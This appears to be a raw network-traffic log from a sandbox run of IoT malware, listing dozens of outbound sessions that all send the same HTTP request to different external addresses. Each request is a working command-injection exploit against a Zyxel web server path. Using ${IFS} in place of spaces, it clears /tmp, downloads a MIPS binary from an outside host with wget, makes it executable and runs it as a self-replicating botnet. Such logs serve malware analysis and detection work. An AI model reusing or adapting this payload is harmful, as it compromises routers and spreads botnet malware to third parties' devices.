                                                Jan 12, 2024 18:24:37.910818100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4978192.168.2.1340814186.213.35.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.910849094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4979192.168.2.1350630151.168.58.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.910890102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4980192.168.2.1356022200.216.91.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.910939932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4981192.168.2.1340318123.129.95.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.910998106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4982192.168.2.1342492194.203.71.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.911024094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4983192.168.2.1337724102.50.177.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.911060095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4984192.168.2.13368221.248.141.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.911092997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4985192.168.2.1352832170.91.38.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.911145926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4986192.168.2.135352493.24.53.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.911195040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4987192.168.2.1338974141.3.205.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.911241055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4988192.168.2.133392618.225.209.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.911267996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4989192.168.2.1344078111.103.229.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.911302090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4990192.168.2.135266835.163.190.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.911322117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4991192.168.2.1338448216.62.19.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.911370993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4992192.168.2.133366835.21.117.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.911395073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4993192.168.2.1333242177.179.223.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.911446095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4994192.168.2.1347828213.71.165.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.911499977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4995192.168.2.1360824187.140.18.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.911551952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4996192.168.2.1349736141.127.175.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.911577940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4997192.168.2.134440454.81.235.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.911628962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4998192.168.2.1334698190.64.207.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.911658049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4999192.168.2.1355908198.59.192.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.911715984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5000192.168.2.1351614194.128.89.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.911729097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5001192.168.2.136089413.48.220.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.911793947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5002192.168.2.1358298217.201.223.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.911833048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5003192.168.2.1346734109.235.2.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.911891937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5004192.168.2.1352418133.3.153.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.911931992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5005192.168.2.134647434.182.180.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.911950111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5006192.168.2.1357200212.41.239.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.912015915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5007192.168.2.1350090201.160.67.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.912074089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5008192.168.2.134611279.83.129.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.912122965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5009192.168.2.13446564.235.121.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.912148952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5010192.168.2.133936075.8.78.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.912197113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5011192.168.2.135488675.47.187.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.912242889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5012192.168.2.1338994206.155.123.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.912267923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5013192.168.2.134450868.199.165.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.912328959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5014192.168.2.134778061.82.222.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.912352085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5015192.168.2.135881647.109.78.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.912399054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5016192.168.2.1333678132.221.54.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.912425995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5017192.168.2.13356889.132.61.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.912478924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5018192.168.2.1360258177.151.132.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.912503958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5019192.168.2.1342626107.250.0.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.912556887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5020192.168.2.135764081.79.21.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.912607908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5021192.168.2.1359686208.14.27.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.912657976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5022192.168.2.1348794203.213.103.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.912708044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5023192.168.2.1339506160.87.199.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.912750006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5024192.168.2.1351680153.56.5.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.912784100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5025192.168.2.133551618.93.94.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.912827015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5026192.168.2.134415294.12.125.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.912857056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5027192.168.2.135368646.181.76.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.912887096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5028192.168.2.1344476124.41.101.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.912931919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5029192.168.2.136062257.110.145.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.912971020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5030192.168.2.1340292143.179.151.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.913018942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5031192.168.2.134111842.236.245.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.913047075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5032192.168.2.1341494122.206.188.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.913088083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5033192.168.2.136055240.137.238.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.913120985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5034192.168.2.134202684.111.177.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.913171053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5035192.168.2.1342124180.7.42.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.913201094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5036192.168.2.1352626195.9.133.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.913254976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5037192.168.2.1355534177.232.36.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.913305044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5038192.168.2.1339276205.62.144.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.913321018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5039192.168.2.134601818.70.70.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.913362026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5040192.168.2.1340988202.78.121.4443
                                                TimestampBytes transferredDirectionData
